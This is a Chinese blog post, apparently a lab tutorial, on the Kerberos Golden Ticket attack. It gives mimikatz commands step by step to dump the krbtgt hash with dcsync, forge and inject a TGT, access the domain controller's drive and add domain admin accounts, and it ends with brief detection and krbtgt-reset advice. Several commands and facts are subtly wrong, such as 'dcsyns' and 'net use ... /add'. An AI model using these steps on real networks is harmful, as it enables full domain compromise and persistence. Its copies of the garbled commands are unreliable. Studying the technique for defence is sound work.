0%

域渗透提权维权之金票

前言

域内常用的两种攻击包括黄金票据Golden ticket和白银票据SILVER TICKET,本篇博客先来介绍一下金票

域环境

ROLE IP OS
DC域控 10.xx.xx.xx 2012

条件:域名+域的SID+KRBTGT的NTLM-hash

票据生成步骤:

  1. 域名

    1
    ipconfig /all
  2. 域的SID值

    1
    lsadump::dcsyns /domain:wlaq.com /user:krbtgt

    SID:500代表管理员

  3. 域的KRBTGT账户NTLM-HASH

    1
    lsadump::dcsyns /domain:wlaq.com /user:krbtgt
  4. 伪造任意域管账号

    1
    net user test password /add /domain

0x01.获取域SID及krbtgt的HTLM-hash

先在DC上新建一个实验用户swanq,此攻击都是基于在域控机子上的普通域内账户.即普通域内账户没有创建域管账户的权限或提升普通用户权限,而利用黄金票据可以做到

获取SID

mimikatz获取域控SID及krbtgt的NTLMhash.可在域控或在登陆过域控账户的域成员上获取

1
lsadump::dcsync /domain:wlaq.com /user:krbtgt

dcsync

概述:mimikatz功能,可模拟DC域控并从DC中导出帐户密码的hash

详解:

  • 在dcsync出现之前,要想获得域用户的hash,必须得先登录域控+在域控上执行代码后才可以获得域用户的哈希。而mimikatz增加的dcsync功能,可以模仿域控从真实的域控当中请求数据

  • dcsync特点在于不用登录服务器,就可以远程通过域数据同步复制的方式获得想要的用户口令。

0x02.伪造票据

在非域控的机子上,需要先清除本地票据缓存,但因此swanq用户刚创建且并未有其他服务需要票据,所以此处为空,不需要

1
kerberos::purge   

得到krbtgt hash后,用mimikatz的Kerberos::golden功能离线生成金票ticket.kiribi伪造TGT

1
kerberos::golden /user:swanq /domain:wlaq.com /sid:{s-1-5-21-xxx}  /krbtgt:{ntlm-hash} /ticket:ticket.kiribi

0x03.票据利用

查看本地保存的票据,确认无误

1
kerberos::list

或者klist也可

将伪造的黄金票据导入内存

1
Kerberos::ptt ticket.kiribi

此时可以直接将DC的C盘映射到本地h盘,进行访问,访问有两种方式:

其一

其二

入DC检查

除了映射之外也可直接添加域管账户

1
net use username password /add /domain

入DC检查

不过此域管账户并没有本地登录权限,还是需要加入administrator组

0x04.检测及清理

检测:

  1. 伪造自己是administrator,此时日志无法检测,但是可以检测是否在常用IP段出现。
  2. 用wireshark可以看到认证流程只有4769->4624

清理:

  1. 即时修改krbtgt账号密码,且需修改两次以确保不保留密码历史记录
  2. 官方有重置密码的脚本,建议定期重置:https://github.com/microsoft/New-KrbtgtKeys.ps1

总结:

  1. 正常的认证访问服务触发事件顺序为:4768(TGT)-4769(TGS)-4624(logon)
  2. mimikatz在win2003及以下导入黄金票据报错
  3. 事件4624-登录
  4. 事件4672-特殊登录:SYSTEM(本地系统)帐户的每次登录都会触发此事件,属正常事件
  5. eventvwr打开windows事件查看器

参考:

  1. chz-大佬竟在我身边:https://zhuanlan.zhihu.com/p/385465988
  2. 域控是最高级,域管是任何被域控加入域管的域成员
  3. 新建域用户之后,需要给域用户配置隶属于管理员的权限,才允许本地登录:https://blog.csdn.net/weixin_43760829/article/details/89437363
  4. 远程桌面命令行指令:mstsc(Microsoft Terminal Server Connection)
  5. 需要熟悉Active Directory 用户和计算机、组策略管理
  6. https://ares-x.com/2020/03/21/%E5%9F%9F%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%83%EF%BC%89PTT-%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB/#%E8%8E%B7%E5%8F%96krbtgt%E7%94%A8%E6%88%B7%E5%93%88%E5%B8%8C
  7. 存在错误但为主要参考:https://www.jianshu.com/p/4936da524040
  8. mimikatz详情:https://wooyun.js.org/drops/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part3.html
  9. https://www.youtube.com/watch?v=f6SleGakcE0
你想在文章末尾对读者说的话